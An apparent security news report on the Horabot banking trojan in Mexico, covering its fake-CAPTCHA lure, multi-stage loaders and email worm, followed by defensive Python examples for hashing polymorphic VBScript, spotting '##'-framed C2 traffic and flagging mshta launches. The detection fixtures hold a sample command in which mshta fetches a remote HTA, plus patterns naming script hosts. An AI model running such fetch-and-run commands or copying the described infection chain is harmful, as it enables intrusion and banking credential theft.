Horabot Banking Trojan Resurfaces in Mexico With Multi-Stage Phishing and Email Worm Tactics
Cybersecurity News (archived Mar 19, 2026)
A well-known banking trojan called Horabot has resurfaced in an active campaign targeting users across Mexico, combining a multi-stage infection chain with an email worm that turns every compromised machine into a phishing relay.
The threat bundles a Delphi-based banking trojan with a PowerShell-driven spreader, making it one of the more layered financially motivated threats seen in Latin America.
The attack begins with a fake CAPTCHA page that instructs victims to open the Windows Run dialog (Win+R) and paste a command. No software flaw is exploited: the pasted command invokes mshta.exe on a malicious HTA file, which silently launches the infection chain.
Because the victim runs the command, the technique sidesteps endpoint defenses that key on exploit behaviour or on untrusted executables; what actually runs is a signed Windows system binary, mshta.exe, executing attacker-supplied script content.
Securelist analysts identified this campaign after a suspicious mshta execution alert triggered within a monitored customer environment.
The team traced the activity to a fake CAPTCHA page and mapped the full attack chain by probing the adversary’s infrastructure.
Fake CAPTCHA page (Source – Securelist)
During that process, researchers found an exposed victim log on the attacker’s own server, revealing 5,384 infected machines — 5,030, or roughly 93%, located in Mexico. Records stretched back to May 2025, confirming the operation had been running for months before detection.
The threat actors show clear ties to Brazil. Comments inside the spreader’s PowerShell code were written in casual Brazilian Portuguese, and the encryption key used for resource decryption references the phrase “pega a visão,” meaning “get the picture” in Brazilian slang.
The phishing emails distributed by the worm are written in Spanish and crafted as fake invoices or confidential business documents targeting Mexican recipients.
The Delphi banking trojan — also tracked as Casbaneiro, Ponteiro, and Metamorfo — uses fake bank overlay pop-ups to steal login credentials during active banking sessions.
The email worm also harvests contact addresses from the victim's inbox through Outlook's MAPI namespace, the same COM interface a legitimate add-in would use, and sends each one a Spanish-language phishing email carrying a malicious PDF that restarts the entire infection cycle.
Multi-Stage Infection Mechanism
What sets this campaign apart is not just its payload, but the elaborate delivery route. Each stage introduces a fresh layer of obfuscation before the final malware arrives.
After the HTA file executes, it fetches a JavaScript loader from an attacker-controlled domain, which then pulls and runs an obfuscated VBScript.
This VBScript uses server-side polymorphism — delivering a slightly different version of the code on every request to defeat signature-based detection.
A second, more complex VBScript of over 400 lines acts as the operation’s workhorse, collecting the victim’s IP address, hostname, username, and OS version before sending that data to a command-and-control server.
It drops AutoIT components to disk, plants a LNK shortcut in the Startup folder for persistence, and downloads the next stage.
The AutoIT script then decrypts an AES-192-encrypted blob using a key derived from the seed value 99521487 and loads the resulting DLL directly into memory — that DLL is the banking trojan.
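The server-side polymorphism described for the VBScript stage above changes the script's bytes on every download, so file hashes and byte-pattern signatures miss it; what stays constant is the script's structure. The following is an added example, not code from the article or from Securelist, of hashing a VBScript after normalizing it: comments and whitespace are dropped, keywords and built-ins are lowercased, member names after a dot are kept because they must match the COM interface, and every other identifier is renamed in order of first appearance. The two variants are constructed, benign stand-ins for polymorphic copies of one loader, not the campaign's code.

```python
import hashlib
import re

# Constructed, benign VBScript snippets standing in for two server-side
# polymorphic variants of one loader (illustrative samples, not the campaign's
# code). They behave identically but differ in identifier names, comments and
# whitespace, which changes every byte-level hash.
VARIANT_A = '''\
' stage loader
Dim shellObj, cmdText
Set shellObj = CreateObject("WScript.Shell")
cmdText = "ping" & " -n 1 " & "localhost"
shellObj.Run cmdText, 0, True
'''

VARIANT_B = '''\
Dim qzx81,  wq09    ' names change on every request
Set qzx81 = CreateObject("WScript.Shell")
wq09 = "ping" & " -n 1 " & "localhost"
qzx81.Run   wq09,0,True
'''

# A genuinely different script, to show the structural hash still separates real changes.
OTHER_SCRIPT = '''\
Dim fso
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile "C:\\temp\\x.txt"
'''

KEYWORDS = {
    "dim", "set", "if", "then", "else", "elseif", "end", "function", "sub",
    "call", "for", "next", "to", "step", "do", "loop", "while", "wend", "true",
    "false", "nothing", "and", "or", "not", "exit", "on", "error", "resume",
    "goto", "new", "each", "in", "is", "mod", "byval", "byref", "const",
    "redim", "select", "case", "with", "private", "public", "class",
}
# Built-in functions and objects the author cannot rename without breaking the script.
BUILTINS = {
    "createobject", "getobject", "wscript", "msgbox", "len", "mid", "left",
    "right", "chr", "asc", "replace", "split", "join", "execute", "eval",
    "ucase", "lcase", "instr", "trim", "cstr", "cint", "clng", "int", "array",
    "ubound", "lbound", "now", "timer", "rnd", "randomize", "err",
}

TOKEN_RE = re.compile(
    r"(?P<comment>'[^\n]*|\b[Rr][Ee][Mm]\b[^\n]*)"
    r'|(?P<string>"(?:[^"]|"")*")'
    r"|(?P<number>\d+(?:\.\d+)?)"
    r"|(?P<ident>[A-Za-z_][A-Za-z0-9_]*)"
    r"|(?P<newline>\r?\n|:)"
    r"|(?P<ws>[ \t]+)"
    r"|(?P<op>[^\sA-Za-z0-9_\"'])"
)


def normalize(src: str) -> list:
    """Tokenize VBScript and rewrite it into a canonical token stream.

    Comments and whitespace are dropped, keywords and built-ins are lowercased,
    member names after '.' are kept (they must match the COM interface), and
    every other identifier is renamed V0, V1, ... in order of first appearance.
    """
    tokens = []
    renames = {}
    prev = None
    for m in TOKEN_RE.finditer(src):
        kind = m.lastgroup
        text = m.group()
        if kind in ("comment", "ws"):
            continue
        if kind == "newline":
            if tokens and tokens[-1] != "\n":
                tokens.append("\n")
            prev = "\n"
            continue
        if kind == "ident":
            low = text.lower()
            if low in KEYWORDS or low in BUILTINS or prev == ".":
                text = low
            else:
                text = renames.setdefault(low, f"V{len(renames)}")
        tokens.append(text)
        prev = text
    return tokens


def structural_hash(src: str) -> str:
    """SHA-256 over the normalized token stream; stable across renamed variants."""
    return hashlib.sha256(" ".join(normalize(src)).encode()).hexdigest()


def raw_hash(src: str) -> str:
    """Plain SHA-256 of the file bytes, which polymorphism defeats."""
    return hashlib.sha256(src.encode()).hexdigest()


if __name__ == "__main__":
    for name, src in (("A", VARIANT_A), ("B", VARIANT_B), ("other", OTHER_SCRIPT)):
        print(name, "raw:", raw_hash(src)[:16], "structural:", structural_hash(src)[:16])
```

A generator that also reorders statements or splits string literals differently would defeat this normalizer; stronger versions additionally merge concatenated string literals and hash on the sequence of COM calls rather than on the whole token stream.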
It communicates with its C2 server over a custom TCP protocol, wrapping commands in structured tags, with all traffic encrypted through a stateful XOR cipher.
The cipher output is framed between double "##" markers, a pattern rare enough in raw TCP traffic to serve as a reliable network detection signature.
C2 socket address extraction (Source – Securelist)
Analysts noted that the cipher’s rigid, repetitive structure actually makes it easier to catch with a standard IDS rule.
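To illustrate the "##" framing as a network signature, here is an added example (not Securelist's published Suricata rule, and not code from the article) that scans TCP payloads for a leading and trailing "##" and grades each hit by whether the framed body contains non-printable bytes, as XOR-encrypted data usually does. The payloads are constructed samples; the tag layout and cipher state of the real protocol are not published on this page, so the framed bodies are arbitrary bytes standing in for ciphertext.

```python
import math
import string

MARKER = b"##"
PRINTABLE = set(string.printable.encode())

# Constructed sample TCP payloads (synthetic, not captured traffic). The first
# two follow the "##...##" framing the article describes; their body bytes are
# arbitrary stand-ins for XOR-encrypted tagged commands, because the real tag
# layout and cipher state are not published on this page.
SAMPLE_PAYLOADS = [
    MARKER + bytes(range(0x83, 0xC0)) + MARKER,              # framed, non-printable body
    MARKER + b"\x01\x7f\x9c cmd \xde\xad" + MARKER,          # framed, short body
    b"## Release notes ##\n\n- fixed login bug\n",           # markdown, no trailing marker
    b"## Heading ##",                                        # printable text framed both ends
    b"GET /index.html HTTP/1.1\r\nHost: example.com\r\n\r\n",
    MARKER,                                                  # marker with no body
]


def shannon_entropy(data: bytes) -> float:
    """Bits per byte of the data; encrypted output tends towards 8.0."""
    if not data:
        return 0.0
    n = len(data)
    counts = {}
    for b in data:
        counts[b] = counts.get(b, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def framed_body(payload: bytes):
    """Return the bytes between a leading and a trailing '##', else None.

    Framing rule (an assumption based on the article's description): the
    payload starts with '##', ends with '##' and has at least one byte between.
    """
    if len(payload) < 2 * len(MARKER) + 1:
        return None
    if not (payload.startswith(MARKER) and payload.endswith(MARKER)):
        return None
    return payload[len(MARKER):-len(MARKER)]


def classify(payload: bytes) -> str:
    """'high': framed and the body has non-printable bytes (consistent with
    XOR-encrypted data); 'low': framed but fully printable; 'none': not framed."""
    body = framed_body(payload)
    if body is None:
        return "none"
    if any(b not in PRINTABLE for b in body):
        return "high"
    return "low"


def scan(payloads):
    """Return one alert per framed payload, with the body entropy for context."""
    alerts = []
    for i, p in enumerate(payloads):
        verdict = classify(p)
        if verdict != "none":
            alerts.append({"index": i, "verdict": verdict,
                           "entropy": round(shannon_entropy(framed_body(p)), 2)})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_PAYLOADS):
        print(alert)
```

The production rule should be Securelist's published one; the point of the grading step is that plain-text payloads such as Markdown headings can also begin and end with "##", so a raw content match wants a second condition before it pages anyone.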
Security teams should block HTA file execution from untrusted sources, commonly by restricting mshta.exe through AppLocker or WDAC or by changing the .hta file association, and monitor closely for suspicious mshta activity, especially mshta.exe launched with a URL or a file in a user-writable location on its command line.
Deploying the published YARA rules for both the Horabot Delphi trojan and AutoIT loader, together with the Suricata rule targeting the double "##" C2 traffic pattern, will help detect infections early.
All shared indicators of compromise — including the attacker-controlled domains and socket addresses — should be added to network blocklists without delay.
User awareness training on fake CAPTCHA lures and on PDF attachments with embedded buttons remains a critical defense layer; the single most useful message is that no legitimate verification step ever asks a user to paste a command into the Run dialog.
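The mshta alert that started the investigation, and the monitoring recommendation above, can be expressed as a small set of process-creation rules. The following is an added example, not the detection Securelist used, run over constructed Sysmon-style records: it flags mshta.exe launched with a URL or script-protocol handler, mshta.exe running an HTA from a user-writable folder, and any script host spawned by mshta.exe, and it records whether the parent was explorer.exe, which is what a Win+R paste looks like (an assumption used for context, not as a requirement). Paths and hostnames in the records are invented.

```python
import ntpath
import re

# Constructed Sysmon-style process-creation records (Event ID 1). Field names
# follow Sysmon; the paths and hostnames are invented for this example.
SAMPLE_EVENTS = [
    {   # Run-dialog paste: explorer.exe launches mshta with a remote HTA
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": "mshta http://captcha.example.invalid/verify.hta",
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {   # Next stage: the HTA's script spawns wscript for the VBScript loader
        "Image": r"C:\Windows\System32\wscript.exe",
        "CommandLine": r"wscript.exe //B C:\Users\alice\AppData\Local\Temp\ld.vbs",
        "ParentImage": r"C:\Windows\System32\mshta.exe",
    },
    {   # HTA dropped to a user-writable folder and run from there
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": r"mshta.exe C:\Users\alice\AppData\Roaming\update.hta",
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {   # Vendor installer using a local HTA under Program Files (lower confidence)
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": r'mshta.exe "C:\Program Files\Vendor\setup.hta"',
        "ParentImage": r"C:\Program Files\Vendor\setup.exe",
    },
    {   # Unrelated activity
        "Image": r"C:\Windows\System32\notepad.exe",
        "CommandLine": "notepad.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
    },
]

# Script hosts and LOLBins that mshta-hosted script commonly chains into.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe",
                "cmd.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
# mshta accepts URLs and javascript:/vbscript: protocol handlers on its command line.
REMOTE_RE = re.compile(r"https?://|\b(?:javascript|vbscript):", re.IGNORECASE)
# Locations a standard user can write to and therefore drop an HTA into.
USER_WRITABLE_RE = re.compile(r"\\(?:Users\\[^\\]+\\|ProgramData\\|Windows\\Temp\\)",
                              re.IGNORECASE)


def basename(path: str) -> str:
    # ntpath understands Windows separators even when this runs on Linux.
    return ntpath.basename(path).lower()


def evaluate(ev: dict):
    """Return an alert dict for a suspicious record, or None."""
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    if image == "mshta.exe":
        # Parent explorer.exe is what a Win+R paste looks like; recorded as
        # context only (an assumption), never required for the alert to fire.
        from_run_dialog = parent == "explorer.exe"
        if REMOTE_RE.search(cmd):
            return {"rule": "mshta_remote_content", "severity": "high",
                    "run_dialog_consistent": from_run_dialog}
        if USER_WRITABLE_RE.search(cmd):
            return {"rule": "mshta_user_writable_hta", "severity": "medium",
                    "run_dialog_consistent": from_run_dialog}
        return {"rule": "mshta_local_hta", "severity": "low",
                "run_dialog_consistent": from_run_dialog}
    if parent == "mshta.exe" and image in SCRIPT_HOSTS:
        return {"rule": "mshta_spawns_script_host", "severity": "high", "child": image}
    return None


def run(events):
    """Evaluate every record and return the alerts with their record index."""
    alerts = []
    for i, ev in enumerate(events):
        alert = evaluate(ev)
        if alert is not None:
            alerts.append(dict(index=i, **alert))
    return alerts


if __name__ == "__main__":
    for alert in run(SAMPLE_EVENTS):
        print(alert)
```

The vendor-installer record is graded low rather than ignored on purpose: mshta.exe has few legitimate uses on a modern workstation, and blocking it outright with AppLocker or WDAC is usually simpler than tuning the detection.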